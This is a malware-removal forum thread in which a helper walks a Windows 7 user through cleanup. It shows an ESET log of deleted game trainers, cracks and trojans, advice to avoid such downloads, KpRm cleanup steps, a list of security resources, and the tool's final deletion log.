E:\ALL GG!\GGGODAM!!\DA TOOL TRAIN!~S~\TRAINERS 1! ~SEALED~\TRAINERSAGA I!\DUNGEON SIEGE!\DA TRAINERS GOOO!\1st fail!!\asx-p8-ds2 (2).exe    a variant of Win32/GameHack.EH potentially unsafe application    cleaned by deleting

E:\ALL GG!\GGGODAM!!\DA TOOL TRAIN!~S~\TRAINERS 1! ~SEALED~\TRAINERSAGA I!\DUNGEON SIEGE!\DA TRAINERS GOOO!\1st fail!!\asx-p8-ds2.exe    a variant of Win32/GameHack.EH potentially unsafe application    cleaned by deleting

E:\ALL GG!\GGGODAM!!\DA TOOL TRAIN!~S~\TRAINERS 1! ~SEALED~\TRAINERSAGA I!\DUNGEON SIEGE!\DA TRAINERS GOOO!\asx-ds2_For_v2.2.exe    a variant of Win32/GameHack.EH potentially unsafe application    cleaned by deleting

E:\ALL GG!\GGGODAM!!\DA TOOL TRAIN!~S~\TRAINERS 1! ~SEALED~\TRAINERSAGA I!\DUNGEON SIEGE!\DA TRAINERS GOOO!\pztrain.exe    a variant of Win32/GameHack.O potentially unsafe application    cleaned by deleting

E:\ALL GG!\GGGODAM!!\DA TOOL TRAIN!~S~\TRAINERS 1! ~SEALED~\TRAINERSAGA I!\GOG!\RAIDEN III\RaidenIIIDE.Plus3.Trainer.exe    a variant of Win32/GameHack.CNW potentially unsafe application    cleaned by deleting

E:\ALL GG!\GGGODAM!!\DA TOOL TRAIN!~S~\TRAINERS 1! ~SEALED~\TRAINERSAGA I!\GOG!\RAIDEN IV!\RaidenIVOverkill.Plus2.Trainer.exe    a variant of Win32/GameHack.CNW potentially unsafe application    cleaned by deleting

E:\ALL GG!\GGGODAM!!\DA TOOL TRAIN!~S~\TRAINERS 1! ~SEALED~\TRAINERSAGA I!\ORCS MUST DIE!\Orcs Must Die 2 V1.0.0.362 Steam Trainer +7 MrAntiFun.EXE    a variant of Win32/HackTool.CheatEngine.AF potentially unsafe application    cleaned by deleting

E:\ALL GG!\GGGODAM!!\DA TOOL TRAIN!~S~\TRAINERS 1! ~SEALED~\TRAINERSAGA I!\SACRED!\SacredGold_CH_promo.exe    a variant of MSIL/GameHack.AEL potentially unsafe application    cleaned by deleting

E:\ALL GG!\GGGODAM!!\DA TOOL TRAIN!~S~\TRAINERS 1! ~SEALED~\TRAINERSAGA I!\THE WITCHERS!\UNPCK!\The_Witcher_EE_TRAiNER-STN.exe    a variant of Win32/HackTool.CheatEngine.AF potentially unsafe application    cleaned by deleting

E:\ALL GG!\GGGODAM!!\DA TOOL TRAIN!~S~\TRAINERS 1! ~SEALED~\TRAINERSAGA I!\THE WITCHERS!\UNPCK!\trainer.exe    a variant of Win32/HackTool.CheatEngine.AB potentially unsafe application    cleaned by deleting

E:\ALL GG!\GGGODAM!!\DA TOOL TRAIN!~S~\TRAINERS 1! ~SEALED~\TRAINERSAGA I!\THE WITCHERS!\UNPCK!\witcher1steam.exe    a variant of Win32/HackTool.CheatEngine.AF potentially unsafe application    cleaned by deleting

E:\ALL GG!\GGGODAM!!\DA TOOL TRAIN!~S~\TRAINERS 1! ~SEALED~\TRAINERSAGA I!\TITAN QUEST!\Titan Quest Anniversary Edition V1.3 Trainer +8 MrAntiFun.EXE    a variant of Win32/HackTool.CheatEngine.AF potentially unsafe application    cleaned by deleting

E:\ALL GG!\GGGODAM!!\DA TOOL TRAIN!~S~\TRAINERS 1! ~SEALED~\TRAINERSAGA I!\TRAINERS!\RA2YR!\AZ Yuri Hack 2.exe    a variant of Win32/GameHack.EW potentially unsafe application    cleaned by deleting

E:\ALL GG!\GGGODAM!!\DA TOOL TRAIN!~S~\TRAINERS 1! ~SEALED~\TRAINERSAGA I!\TRAINERS!\RA2YR!\yuri1001.exe    a variant of Win32/GameHack.EW potentially unsafe application    cleaned by deleting

E:\ALL GG!\GGGODAM!!\DA TOOL TRAIN!~S~\TRAINERS 1! ~SEALED~\TRAINERSAGA I!\TRAINERS!\RA2YR!\YuriTrainer.exe    Win32/HackTool.CheatEngine.AB potentially unsafe application    cleaned by deleting

E:\ALL GG!\GGGODAM!!\DA TOOL TRAIN!~S~\TRAINERS 1! ~SEALED~\TRAINERSAGA I!\TRAINERS!\asx-p7-dndd.exe    a variant of Win32/GameHack.EH potentially unsafe application    cleaned by deleting

E:\ALL GG!\GGGODAM!!\DA TOOL TRAIN!~S~\TRAINERS 1! ~SEALED~\TRAINERSAGA I!\TRAINERS!\Crashlands V1.4.10.10 Trainer +1 MrAntiFun.exe    a variant of MSIL/GameHack.AIM potentially unsafe application    cleaned by deleting

E:\ALL GG!\GGGODAM!!\DA TOOL TRAIN!~S~\TRAINERS 1! ~SEALED~\TRAINERSAGA I!\TRAINERS!\ImpossibleCreatures-Plus2-Trainer.exe    a variant of Win32/GameHack.CNX potentially unsafe application    cleaned by deleting

E:\ALL GG!\GGGODAM!!\DA TOOL TRAIN!~S~\TRAINERS 1! ~SEALED~\TRAINERSAGA I!\TRAINERS!\pztrain.exe    a variant of Win32/GameHack.ABX potentially unsafe application    cleaned by deleting

E:\ALL GG!\GGGODAM!!\DA TOOL TRAIN!~S~\TRAINERS 1! ~SEALED~\TRAINERSAGA I!\TRAINERS!\StarWarsBattlefrontII-Plus6-Trainer.exe    a variant of Win32/GameHack.CNX potentially unsafe application    cleaned by deleting

E:\ALL GG!\GGGODAM!!\DA TOOL TRAIN!~S~\TRAINERS 1! ~SEALED~\TRAINERSAGA I!\WAR OF THE RINGS SUPP!\zzpztrain.exe    a variant of Win32/GameHack.ABX potentially unsafe application    cleaned by deleting

E:\ALL GG!\GGGODAM!!\DA TOOL TRAIN!~S~\TRAINERS 1! ~SEALED~\TRAINERSAGA I!\Bionic Dues V1.103 Trainer +4 MrAntiFun.EXE    a variant of Win32/HackTool.CheatEngine.AF potentially unsafe application    cleaned by deleting

E:\ALL GG!\GGGODAM!!\DA TOOL TRAIN!~S~\UNPACK II!\D&D +6\asx-p7-dndd.exe    a variant of Win32/GameHack.EH potentially unsafe application    cleaned by deleting

E:\ALL GG!\GGGODAM!!\DA TOOL TRAIN!~S~\UNPACK II!\D&D +7\asx-p7-dndd.exe    a variant of Win32/GameHack.EH potentially unsafe application    cleaned by deleting

E:\ALL GG!\GGGODAM!!\DA TOOL TRAIN!~S~\ZZ OLD REUSE & DELETE!\Bionic Dues V1.103 Trainer +4 MrAntiFun.EXE    a variant of Win32/HackTool.CheatEngine.AF potentially unsafe application    cleaned by deleting

E:\ALL GG!\GGGODAM!!\DA TOOL TRAIN!~S~\ZZ OLD REUSE & DELETE!\Orcs Must Die 2 V1.0.0.362 Steam Trainer +7 MrAntiFun.EXE    a variant of Win32/HackTool.CheatEngine.AF potentially unsafe application    cleaned by deleting

E:\ALL GG!\GGGODAM!!\DA TOOL TWO!~S~\Alien Swarm! Reactive Drops!\TRAINER!\Alien Swarm Reactive Drop V05.02.2017 Trainer +3 MrAntiFun.EXE    a variant of Win32/HackTool.CheatEngine.AF potentially unsafe application    cleaned by deleting

E:\ALL GG!\GGGODAM!!\DA TOOL TWO!~S~\D. FENCE!\Defense Grid!\UNRAR!\Defese Grid The Awakening 32.EXE    a variant of Win32/HackTool.CheatEngine.AF potentially unsafe application    cleaned by deleting

E:\ALL GG!\GGGODAM!!\DA TOOL TWO!~S~\UNRAR!\Ion Fury V FitGril Plus 4 Trainer 64.EXE    a variant of Win32/HackTool.CheatEngine.AF potentially unsafe application    cleaned by deleting

E:\ALL GG!\GGGODAM!!\NEED FOR SPEED!\UNRAR!\NFS.exe    a variant of Win32/Packed.Themida.HFH trojan    cleaned by deleting

E:\ALL GG!\GGGODAM!!\REAL PERFECT GAMING!\DIVINE DIVINITY!\ORIGINAL SIN TRAIN!\Divinity Original Sin Enhanced Edition V2.0.119.430 Trainer +12 MrAntiFun.EXE    a variant of Win32/HackTool.CheatEngine.AF potentially unsafe application    cleaned by deleting

E:\ALL GG!\GGGODAM!!\REAL PERFECT GAMING!\Dragon Age!\dragonageorigins1047trainer\brew-dao104.exe    a variant of Win32/GameHack.E potentially unsafe application    deleted

E:\ALL GG!\GGGODAM!!\REAL PERFECT GAMING!\Dragon Age!\dragonageoriginsawakening1037trainer\brewers.exe    a variant of Win32/GameHack.E potentially unsafe application    deleted

E:\ALL GG!\GGGODAM!!\REAL PERFECT GAMING!\Dragon Age!\Dragon Age Origin V1.05.13263 Trainer +4 MrAntiFun.EXE    a variant of Win32/HackTool.CheatEngine.AF potentially unsafe application    cleaned by deleting

E:\ALL GG!\GGGODAM!!\REAL PERFECT GAMING!\Dungeon Sieges!\TRAINERS!\DA TRAINERS GOOO!\1st fail!!\1ST FAIL\asx-p8-ds2.exe    a variant of Win32/GameHack.EH potentially unsafe application    cleaned by deleting

E:\ALL GG!\GGGODAM!!\REAL PERFECT GAMING!\Dungeon Sieges!\TRAINERS!\DA TRAINERS GOOO!\1st fail!!\asx-ds2.exe    a variant of Win32/GameHack.EH potentially unsafe application    cleaned by deleting

E:\ALL GG!\GGGODAM!!\REAL PERFECT GAMING!\Dungeon Sieges!\TRAINERS!\DA TRAINERS GOOO!\1st fail!!\asx-p8-ds2 (2).exe    a variant of Win32/GameHack.EH potentially unsafe application    cleaned by deleting

E:\ALL GG!\GGGODAM!!\REAL PERFECT GAMING!\Dungeon Sieges!\TRAINERS!\DA TRAINERS GOOO!\1st fail!!\asx-p8-ds2.exe    a variant of Win32/GameHack.EH potentially unsafe application    cleaned by deleting

E:\ALL GG!\GGGODAM!!\REAL PERFECT GAMING!\Dungeon Sieges!\TRAINERS!\DA TRAINERS GOOO!\asx-ds2_For_v2.2.exe    a variant of Win32/GameHack.EH potentially unsafe application    cleaned by deleting

E:\ALL GG!\GGGODAM!!\REAL PERFECT GAMING!\Dungeon Sieges!\TRAINERS!\DA TRAINERS GOOO!\pztrain.exe    a variant of Win32/GameHack.O potentially unsafe application    cleaned by deleting

E:\ALL GG!\GGGODAM!!\REAL PERFECT GAMING!\FALLOUT & WASTELAND!\Fallout 3 v1.7.0.3 + 7 Plus Trainer.exe    a variant of Win32/HackTool.CheatEngine.AB potentially unsafe application    cleaned by deleting

E:\ALL GG!\GGGODAM!!\REAL PERFECT GAMING!\JRPGS!\Resonance of Fate End of Eternity 4K HD Edition v1.0 Plus 8 Trainer.exe    a variant of Win64/GameHack.BT potentially unsafe application    cleaned by deleting

E:\ALL GG!\GGGODAM!!\REAL PERFECT GAMING!\MOUNT&BLADE!\TRAINER ORIGINAL!\Mount & Blade Trainer.exe    a variant of Win32/GameHack.F potentially unsafe application    cleaned by deleting

E:\ALL GG!\GGGODAM!!\REAL PERFECT GAMING!\NEVERWINTER!\UNRAR!\Neverwinter Nights +6TR\Neverwinter Nights V1.69.8109 +6TR.EXE    a variant of Win32/HackTool.CheatEngine.AF potentially unsafe application    cleaned by deleting

E:\ALL GG!\GGGODAM!!\SOMETA STUFF!\BEAUTIFUL BRAWLING BASTARDS!\BLAZBLUE!\UNRAR!\BB TRIGGER\BlazBlue - Calamity Trigger v1.0.0.0 + 8 Trainer.exe    a variant of Win32/HackTool.CheatEngine.AB potentially unsafe application    cleaned by deleting

E:\ALL GG!\GGGODAM!!\SOMETA STUFF!\BEAUTIFUL BRAWLING BASTARDS!\BLAZBLUE!\UNRAR!\BB TRIGGER\BLAZBLUE CT Act.2 DELTA10FY.EXE    a variant of Win32/HackTool.CheatEngine.AF potentially unsafe application    cleaned by deleting

E:\ALL GG!\GGGODAM!!\SOMETA STUFF!\BEAUTIFUL BRAWLING BASTARDS!\BLAZBLUE!\UNRAR!\CENTRALFICTION!\BlazBlue Centralfiction V05.05.2017 Trainer +2 MrAntiFun.EXE    a variant of Win32/HackTool.CheatEngine.AF potentially unsafe application    cleaned by deleting

E:\ALL GG!\GGGODAM!!\THE FINAL FRANCHISING!\Lord of the Rings!\B4ME II!\A UNRAR!\DELALL\The Battle for Middle-earth II Witch King Trainer +5.EXE    a variant of Win32/HackTool.CheatEngine.AF potentially unsafe application    cleaned by deleting

E:\ALL GG!\GGGODAM!!\THE FINAL FRANCHISING!\Lord of the Rings!\B4ME II!\A UNRAR!\El Resurgir del Rey Brujo™ Trainer.exe    a variant of Win32/HackTool.CheatEngine.AB potentially unsafe application    cleaned by deleting

E:\ALL GG!\GGGODAM!!\THE FINAL FRANCHISING!\Lord of the Rings!\B4ME II!\A UNRAR!\The Battle for Middle-earth  II Witch King Trainer +5 MrAntiFun.EXE    a variant of Win32/HackTool.CheatEngine.AF potentially unsafe application    cleaned by deleting

E:\ALL GG!\GGGODAM!!\THE FINAL FRANCHISING!\Lord of the Rings!\B4ME II!\A UNRAR!\Trainer-100.exe    a variant of Win32/GameHack.EW potentially unsafe application    cleaned by deleting

E:\ALL GG!\GGGODAM!!\THE FINAL FRANCHISING!\Lord of the Rings!\B4ME II!\A UNRAR!\twk2trn.exe    a variant of Win32/GameHack.BA potentially unsafe application    cleaned by deleting

E:\ALL GG!\GGGODAM!!\THE FINAL FRANCHISING!\Lord of the Rings!\War of the Rings!\WAR OF THE RINGS SUPP!\zzpztrain.exe    a variant of Win32/GameHack.ABX potentially unsafe application    cleaned by deleting

E:\ALL GG!\GGGODAM!!\THE FINAL FRANCHISING!\Pillars of Eternity!\UNRAR!\Pillars of Eternity v1.0.2.0508-v3.03.1047 Plus 24 Trainer.exe    a variant of Win32/GameHack.AUM potentially unsafe application    cleaned by deleting

E:\ALL GG!\GGGODAM!!\THE FINAL FRANCHISING!\PRAETORIANS!\RARED OUT!\FAIL\Trainer Praetorians +5 (Mod 3.0 & 4.0).exe    Win32/GameHack.AD potentially unsafe application    cleaned by deleting

E:\ALL GG!\GGGODAM!!\THE FINAL FRANCHISING!\PRINCE OF PERSIA!\1St!! Sands of Time!\DO!\Princess_Of_Persia_The_Sands_Of_Time_Trainer.exe    a variant of Win32/Packed.Themida.ACU trojan    cleaned by deleting

E:\ALL GG!\GGGODAM!!\WARHAMMER!\Battlefleet Gothic Armada!\BMGA I TRAINERS!\Battlefleet Gothic Armada V1.8.10317 Trainer +9 MrAntiFun.EXE    a variant of Win32/HackTool.CheatEngine.AF potentially unsafe application    cleaned by deleting

E:\ALL GG!\GGGODAM!!\WARHAMMER!\Space Marine!\UNRAR!\2\War_40k_SM_PLUS_8_TRN-dEViATED.exe    a variant of Win32/GameHack.PG potentially unsafe application    cleaned by deleting

E:\ALL GG!\GGGODAM!!\WARHAMMER!\Space Marine!\UNRAR!\3\WH_40K_Space_Marine_Plus_5_Trainer.exe    a variant of Win32/GameHack.JO potentially unsafe application    cleaned by deleting

E:\ALL GG!\GGGODAM!!\WARHAMMER!\Space Marine!\UNRAR!\4\WH40KSM+12Tr-LinGon\WH40KSM+12Tr-LinGon.exe    a variant of Win32/Packed.VMProtect.AAH trojan    cleaned by deleting

E:\ALL GG!\GGGODAM!!\WARHAMMER!\Space Marine!\UNRAR!\5\War_40k_SM_PLUS_8_TRN-dEViATED.exe    a variant of Win32/GameHack.PG potentially unsafe application    cleaned by deleting

E:\ALL GG!\GGGODAM!!\WARHAMMER!\Space Marine!\UNRAR!\WH40KSM+12Tr-LinGon\WH40KSM+12Tr-LinGon.exe    a variant of Win32/Packed.VMProtect.AAH trojan    cleaned by deleting

E:\ALL GG!\GGGODAM!!\WARHAMMER!\Space Marine!\UNRAR!\Warhammer 40k Space Marine V1.0.165 Trainer +3 MrAntiFun.EXE    a variant of Win32/HackTool.CheatEngine.AF potentially unsafe application    cleaned by deleting

E:\ALL GG!\WARCRAFTING!\PLAY!\Warcraft III 1.21\w3l.exe    Win32/GameHack.QJ potentially unsafe application    cleaned by deleting

E:\StallInGGrade!\BEAUTIFUL BRAWLING BASTARDS!\BlazBlue Chronophantasma Extend\steam_api.dll    a variant of Win32/HackTool.Crack.EN potentially unsafe application    cleaned by deleting

E:\StallInGGrade!\BEAUTIFUL BRAWLING BASTARDS!\Dead or Alive 5 - Last Round\steam_api.dll    a variant of Win32/HackTool.Crack.EE potentially unsafe application    cleaned by deleting

E:\StallInGGrade!\BEAUTIFUL BRAWLING BASTARDS!\GUILTY GEAR GENERATION!\GUILTY GEAR XX ACCENT CORE PLUS R\steam_api.dll    a variant of Win32/HackTool.Crack.EN potentially unsafe application    cleaned by deleting

E:\StallInGGrade!\BEAUTIFUL BRAWLING BASTARDS!\Injustice Gods Among Us Ultimate Edition\DiscContentPCG\steam_api.dll    a variant of Win32/HackTool.Crack.CM potentially unsafe application    cleaned by deleting

E:\StallInGGrade!\BEAUTIFUL BRAWLING BASTARDS!\Skullgirls 2nd Encore\steam_api.dll    a variant of Win32/HackTool.Crack.EE potentially unsafe application    cleaned by deleting

E:\StallInGGrade!\BEAUTIFUL BRAWLING BASTARDS!\Street Fighter 30th Anniversary Collection\win32\steam_api.dll    a variant of Win32/HackTool.Crack.EE potentially unsafe application    cleaned by deleting

E:\StallInGGrade!\BEAUTIFUL BRAWLING BASTARDS!\Street Fighter 30th Anniversary Collection\win64\steam_api64.dll    a variant of Win64/HackTool.Crack.J potentially unsafe application    cleaned by deleting

E:\StallInGGrade!\BEAUTIFUL BRAWLING BASTARDS!\The King Of Fighters XIII\steam_api.dll    Win32/HackTool.Crack.CA potentially unsafe application    cleaned by deleting

E:\StallInGGrade!\BEAUTIFUL BRAWLING BASTARDS!\Ultra Street Fighter IV\steam_api.dll    a variant of Win32/HackTool.Crack.CS potentially unsafe application    cleaned by deleting

E:\StallInGGrade!\NEED FOR SPEED!\Need for Speed Undercover\nfs.exe    Win32/TrojanDownloader.Agent.ONZ trojan    deleted

E:\StallInGGrade!\TOTAL WAR!\Medieval II - Total War\steam_api.dll    a variant of Win32/HackTool.Crack.CS potentially unsafe application    cleaned by deleting

E:\WINSTALLERS!\WIN EVERYTHING!\Windows 7 ACTIVE LOAD!\Windows 7 Activator\Windows Loader.exe    Win32/HackTool.WinActivator.I potentially unsafe application    cleaned by deleting

E:\WINSTALLERS!\WIN EVERYTHING!\Windows 7 ACTIVE LOAD!\Windows.7.Loader.v2.0.6 Reloaded -DAZ [Team Rjaa]\Windows Loader.exe    Win32/HackTool.WinActivator.I potentially unsafe application    cleaned by deleting

E:\ZZZZZZBOOT!\WinUSB!!\FileForum_installer.exe    Win32/InstallCore.Gen.A potentially unwanted application    cleaned by deleting

E:\ZZZZZZZZZZZ QUICKTRAIN!\Alien Swarm Reactive Drop V05.02.2017 Trainer +3 MrAntiFun.EXE    a variant of Win32/HackTool.CheatEngine.AF potentially unsafe application    cleaned by deleting

E:\ZZZZZZZZZZZ QUICKTRAIN!\Divinity Original Sin Enhanced Edition V2.0.119.430 Trainer +12 MrAntiFun.EXE    a variant of Win32/HackTool.CheatEngine.AF potentially unsafe application    cleaned by deleting

E:\ZZZZZZZZZZZ QUICKTRAIN!\Dragon Age Origin V1.05.13263 Trainer +4 MrAntiFun.EXE    a variant of Win32/HackTool.CheatEngine.AF potentially unsafe application    cleaned by deleting

E:\ZZZZZZZZZZZ QUICKTRAIN!\Dragon Ball Xenoverse V1.08 Trainer +11 MrAntiFun.EXE    a variant of Win32/HackTool.CheatEngine.AF potentially unsafe application    cleaned by deleting

E:\ZZZZZZZZZZZ QUICKTRAIN!\Fallout 3 v1.7.0.3 + 7 Plus Trainer.exe    a variant of Win32/HackTool.CheatEngine.AB potentially unsafe application    cleaned by deleting

E:\ZZZZZZZZZZZ QUICKTRAIN!\GemCraft Chasing Shadows (+3)[v1.0.6 [Steam][Enjoy].exe    a variant of Win32/GameHack.EFQ potentially unsafe application    cleaned by deleting

E:\ZZZZZZZZZZZ QUICKTRAIN!\Orcs Must Die 2 V1.0.0.362 Steam Trainer +7 MrAntiFun.EXE    a variant of Win32/HackTool.CheatEngine.AF potentially unsafe application    cleaned by deleting

E:\ZZZZZZZZZZZ QUICKTRAIN!\Princess_Of_Persia_The_Sands_Of_Time_Trainer.exe    a variant of Win32/Packed.Themida.ACU trojan    cleaned by deleting

E:\ZZZZZZZZZZZ QUICKTRAIN!\Sacred Gold V2.28 Trainer +2 MrAntiFun.EXE    a variant of Win32/HackTool.CheatEngine.AF potentially unsafe application    cleaned by deleting

 

Game cracks, HackTool.CheatEngine, keygens…..mean trouble.
The sites people go to,  to download these things are usually infected. Just by entering the site can place infection on the computer.


How is the computer at the moment?

Are you ready to remove tools and quarantine folders?

Yeah I am not sad to see them gone or anything and I agree some of those websites are way too fishy.

The computer works great now, better than new install even, thanks so much for everything.

I would also like to defragment it as well, if you got any good suggestions for a tool?

And yes ready for the next step.

 

The computer works great now, better than new install even, thanks so much for everything.

I would also like to defragment it as well, if you got any good suggestions for a tool?

Your welcome

 

When it comes to defragmenting your computer, I suggest you use the tool that comes with the operating system.  I know there are other tools created to do this but I feel Microsoft is better designated.

https://support.microsoft.com/en-us/help/17126/windows-7-improve-performance-defragmenting-hard-disk

 

~~~~~~~~~~~~~~~~

 

Use this tool to remove quarantined items:
 
Please download KpRm by Kernel-panik and save to your Desktop.

  • Click on KpRm.exe to run the tool.

Vista/Windows 7/8/10 users right-click and select Run As Administrator.

  • Put a check mark next to these items:

- Delete tools
- Delete now

  • Click the "Run" button.

[external image: automatic.png]



  • When the tool has finished, it will create and open a log report and  delete itself.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

 

 

  • Answers to common security questions - Best Practices by quietman7, MVP
  • How Malware Spreads - How did I get infected? by quietman7, MVP
  • Simple and easy ways to keep your computer safe and secure on the Internet by Lawrence Abrams, MVP
  • How to Prevent Malware by miekiemoes, MVP
  • How to backup and restore your data using Cobian Backup by YourHighness
  • Slow Computer/browser? It May Not Be Malware by quietman7, MVP
     
  • AdBlock is a browser add-on that blocks annoying banners, pop-ups and video ads.
  • [external image: E8I37RF.png]CryptoPrevent places policy restrictions on loading points for ransomware (eg. CryptoWall), helping prevent the execution of malware.
  • [external image: EG85Vjt.png] Malwarebytes Anti-Exploit (MBAE) is designed to prevent zero-day malware from exploiting vulnerable software.
  • [external image: 6YRrgUC.png] Malwarebytes Anti-Malware Premium (MBAM) works in real-time along side your Anti-Virus to prevent malware execution.
  • [external image: jv4nhMJ.png] NoScript is a Firefox add-on that blocks the actions of malicious scripts by using whitelisting and other technology.
  • [external image: 3O8r9Uq.png] Sandboxie isolates programmes of your choice, preventing files from being written to your HDD unless approved by you.
  • [external image: DgW1XL2.png] Secunia PSI will scan your computer for vulnerable software that is outdated, and automatically find the latest update for you.
  • [external image: j1OLIec.png] SpywareBlaster is a form of passive protection, designed to block the actions of malicious websites and tracking cookies.
  • [external image: sHjS79L.png] Unchecky automatically removes checkmarks for bunlded software in programme installers; helping you avoid adware and PUPs.

For those interested in how to make a backup of your computer
https://forums.malwarebytes.com/topic/136226-backup-software/

 

 

 

 

 

Ok it's done. Thanks again a lot, and thanks for all those resources too, just what I was looking for.

# Run at 10/6/2020 10:36:25 AM
# KpRm (Kernel-panik) version 2.8
# Website https://kernel-panik.me/tool/kprm/
# Run by [removed] # Computer Name: 4WATT
# OS: Windows 7 X64 (7601) Service Pack 1
# Number of passes: 1

- Checked options -

    ~ Delete Tools
    ~ Delete Quarantines

- Delete Tools -


  ## AdwCleaner
     [OK] C:\Users\Ohm\Desktop\adwcleaner_8.0.7.exe deleted
     [OK] C:\Users\Ohm\Desktop\DEFENSE!!\adwcleaner_8.0.7.exe deleted
     [OK] C:\Users\Ohm\Desktop\DEFENSE!!\DEFENSE!\AdwCleaner.exe deleted
     [OK] C:\AdwCleaner deleted

  ## AswMBR
     [OK] HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_ASWMBR deleted

  ## ESET Online Scanner
     [OK] C:\Users\Ohm\Desktop\ESET Online Scanner.lnk deleted
     [OK] C:\Users\Ohm\Desktop\esetonlinescanner.exe deleted
     [OK] C:\Users\Ohm\Desktop\DEFENSE!!\ESET Online Scanner.lnk deleted
     [OK] C:\Users\Ohm\Desktop\DEFENSE!!\esetonlinescanner.exe deleted

  ## FRST
     [OK] C:\Users\Ohm\Desktop\Addition.txt deleted
     [OK] C:\Users\Ohm\Desktop\Fixlog.txt deleted
     [OK] C:\Users\Ohm\Desktop\FRST.txt deleted
     [OK] C:\Users\Ohm\Desktop\FRST64.exe deleted
     [OK] C:\Users\Ohm\Desktop\DEFENSE!!\FRST64.exe deleted
     [OK] C:\FRST deleted

  ## RogueKiller
     [OK] C:\Users\Ohm\Desktop\RogueKiller_setup_ref3.exe deleted
     [OK] C:\Users\Ohm\Desktop\DEFENSE!!\RogueKiller_setup_ref3.exe deleted
     [OK] C:\Users\Ohm\Desktop\DEFENSE!!\DEFENSE!\RogueKiller_portable64.exe deleted
     [OK] C:\ProgramData\RogueKiller\quarantine\01123090332FFB08.meta deleted
     [OK] C:\ProgramData\RogueKiller\quarantine\01123090332FFB08.reg deleted
     [OK] C:\ProgramData\RogueKiller\quarantine\07D97D3748C4F853.meta deleted
     [OK] C:\ProgramData\RogueKiller\quarantine\07D97D3748C4F853.reg deleted
     [OK] C:\ProgramData\RogueKiller\quarantine\186CAB67386AD2D5.meta deleted
     [OK] C:\ProgramData\RogueKiller\quarantine\1ACB0EB61CBF839D.meta deleted
     [OK] C:\ProgramData\RogueKiller\quarantine\1ACB0EB61CBF839D.reg deleted
     [OK] C:\ProgramData\RogueKiller\quarantine\298111C5EE585CBC.meta deleted
     [OK] C:\ProgramData\RogueKiller\quarantine\298111C5EE585CBC.reg deleted
     [OK] C:\ProgramData\RogueKiller\quarantine\2D6B724A66DA16CA.meta deleted
     [OK] C:\ProgramData\RogueKiller\quarantine\2D6B724A66DA16CA.reg deleted
     [OK] C:\ProgramData\RogueKiller\quarantine\32795DF7092312FD.meta deleted
     [OK] C:\ProgramData\RogueKiller\quarantine\32795DF7092312FD.reg deleted
     [OK] C:\ProgramData\RogueKiller\quarantine\43D26E32C75AE1FC.meta deleted
     [OK] C:\ProgramData\RogueKiller\quarantine\6B1ACD25B857E1C4.meta deleted
     [OK] C:\ProgramData\RogueKiller\quarantine\7D1CCB099C70FC28.meta deleted
     [OK] C:\ProgramData\RogueKiller\quarantine\7D1CCB099C70FC28.vir deleted
     [OK] C:\ProgramData\RogueKiller\quarantine\82AC2DE386FD67E6.meta deleted
     [OK] C:\ProgramData\RogueKiller\quarantine\86F534835BB66E9D.meta deleted
     [OK] C:\ProgramData\RogueKiller\quarantine\86F534835BB66E9D.vir deleted
     [OK] C:\ProgramData\RogueKiller\quarantine\8D3EF17154F2F83A.meta deleted
     [OK] C:\ProgramData\RogueKiller\quarantine\A11448B92BB0FE2D.meta deleted
     [OK] C:\ProgramData\RogueKiller\quarantine\A11448B92BB0FE2D.reg deleted
     [OK] C:\ProgramData\RogueKiller\quarantine\A5C77E73F7306989.meta deleted
     [OK] C:\ProgramData\RogueKiller\quarantine\A5C77E73F7306989.vir deleted
     [OK] C:\ProgramData\RogueKiller\quarantine\A9108614CDE96F3F.meta deleted
     [OK] C:\ProgramData\RogueKiller\quarantine\BAED01AA327CA8F8.meta deleted
     [OK] C:\ProgramData\RogueKiller\quarantine\BAED01AA327CA8F8.reg deleted
     [OK] C:\ProgramData\RogueKiller\quarantine\BCD1C77A10ED6501.meta deleted
     [OK] C:\ProgramData\RogueKiller\quarantine\BEE1F00DCB7C1ADC.meta deleted
     [OK] C:\ProgramData\RogueKiller\quarantine\BEE1F00DCB7C1ADC.reg deleted
     [OK] C:\ProgramData\RogueKiller\quarantine\BEE4E3410644576B.meta deleted
     [OK] C:\ProgramData\RogueKiller\quarantine\BEE4E3410644576B.reg deleted
     [OK] C:\ProgramData\RogueKiller\quarantine\CFBB7E5658E5F83E.meta deleted
     [OK] C:\ProgramData\RogueKiller\quarantine\CFBB7E5658E5F83E.vir deleted
     [OK] C:\ProgramData\RogueKiller\quarantine\D4719B8929FB9FD5.meta deleted
     [OK] C:\ProgramData\RogueKiller\quarantine\DD7E426F2D104288.meta deleted
     [OK] C:\ProgramData\RogueKiller\quarantine\DD7E426F2D104288.reg deleted
     [OK] C:\ProgramData\RogueKiller\quarantine\E71006FEFB05D3DC.meta deleted
     [OK] C:\ProgramData\RogueKiller\quarantine\E71006FEFB05D3DC.reg deleted
     [OK] C:\ProgramData\RogueKiller\quarantine\F5EBD90D28A10ABF.meta deleted
     [OK] C:\ProgramData\RogueKiller\quarantine\F5EBD90D28A10ABF.reg deleted
     [OK] C:\ProgramData\RogueKiller\quarantine\FCDE83A446C0E1C2.meta deleted

– KPRM finished in 152.66s –

 

Ask AI

AI can make mistakes. Check the cited posts. Archived advice can be out-of-date

Don't include personal information. Questions and selected public posts go to OpenAI. About Ask AI